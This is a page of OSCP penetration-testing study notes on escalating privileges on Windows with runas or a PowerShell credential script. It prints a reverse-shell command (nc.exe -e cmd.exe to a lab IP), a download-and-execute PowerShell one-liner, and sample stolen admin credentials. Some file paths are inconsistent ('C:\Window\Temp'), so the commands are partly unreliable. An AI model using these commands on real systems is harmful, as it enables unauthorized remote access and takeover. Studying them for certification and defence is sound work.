OSCP Notes
  • Introduction
  • Port Scanning
  • Nmap Port Scanning
  • Nmap Scripts
  • Services Enumeration
    • SMB Enumeration (Port 139, 445)
    • SNMP Enumeraion (Port 161)
    • NFS Enumeration (Port 111, 2049)
    • SMTP Enumeration (Port 25)
    • DNS Enumeration (Port 53)
    • POP3 (Port 110, 25*)
    • MySQL (Port 3306)
    • Oracle (Port 1521)
    • MsSQL (Port 1433)
  • Web / HTTP
    • Web Scanning
    • CMS
    • Directory Fuzzing
    • File Upload
      • Bypass file upload filtering
      • Bruteforcing extensions
      • WebDAV
    • Bruteforce Authentication
    • LFI and RFI
      • Interesting Files for LFI
      • Null Byte Injection
      • PHP Wrappers
    • ShellShock
    • Post Requests
  • password attacks
    • Brute-force service password
    • Cracking Password
    • Custom Worldlist
  • Exploitaion
    • Searchsploit
    • Compiling the Exploit
  • shell
    • Bind and Reverse shell
    • Upgrading shell
    • msfvenom
  • Linux Post Exploitation
    • Linux Manual Exploitation
    • Linux post exploitation scripts
    • Kernel Exploitation
  • windows post exploitation
    • General
    • Manual Exploitaion
    • Dumping the sam file
    • SUDO SU
    • Automated enumeration script
    • Windows Exploit Suggester
  • file transfer
    • General
    • Linux
    • Windows
  • cheatsheets
    • Command injection Cheatsheet
    • Find Command Cheatsheet
    • Netcat
    • SQL Injection Bypass
    • CheckList
    • XSS Payload
Powered by GitBook
On this page
  • When we can use it ?
  • Example
  • Runas
  • Powershell
  • Executing script
  1. windows post exploitation

SUDO SU

  • If you have ever used linux, then probably you are aware of sudo command.This command basically let us run a command as different user,mostly as the root user.On certain linux distros, by using su command we can login as the root user. However this command is very dangerous, hence it is disabled by default in most of the linux distros such as Ubuntu.

  • So while Linux users have the sudo command to switch user account or run commands as super user, what does Windows users have?

But we have below alternatives to that.

  1. Runas command

  2. Powershell script for switching user

When we can use it ?

  • Not a big deal, suppose we have hacked into a windows system through any of the vulnerabilities of network or web application and have low privileged user shell.

  • And also we have got some Administrator credentials through hacking any other system in the domain by hashdump, wce.exe, fgdump.exe or any other tool.

Example

  • Suppose credentials are b33f:b33fpassword

    • So the point to be noted here is — There maybe times when we know the credentials of admin user, but will have a low privileged shell as some other user, Also remote desktop will not be enabled to login as other user. Unlike Linux, we cannot sudo on windows machines, hence we use switch user functionality.

  • So the first thing we always check after getting low privileged shell on windows system is whoami? 

whoami

echo %username%

  • then the next thing would be to check all the user accounts and the privileges given to each of them.

net users

So let’s switch user to b33f and escalate privileges.

Runas

  • We can use runas command to switch user, however sometimes with low privileged user shell, it will not prompt for password input.

  • Runas is a very useful command on Windows OS. This command enables one to run a command in the context of another user account.

runas /user:username program

If above command ask password, well and good.We can enter the password and get privilege escalated, else if it does not ask for password input then we will have to try our powershell script.

Powershell

  • Create below 2 files and transfer them to low privileged shell along with nc.exe

ps-sudo.ps1

$pw= convertto-securestring "b33fpassword" -asplaintext -force
$pp= new-object System.Management.Automation.PSCredential -argumentlist "b33f",$pw
$script= 'C:\Windows\Temp\nc.bat'
Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process C:\Window\Temp\nc.bat -verb Runas}"

nc . bat

C:\Window\Temp\nc.exe 10.11.1.40 443 -e cmd.exe

Executing script

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')
PreviousDumping the sam fileNextAutomated enumeration script

Last updated 3 years ago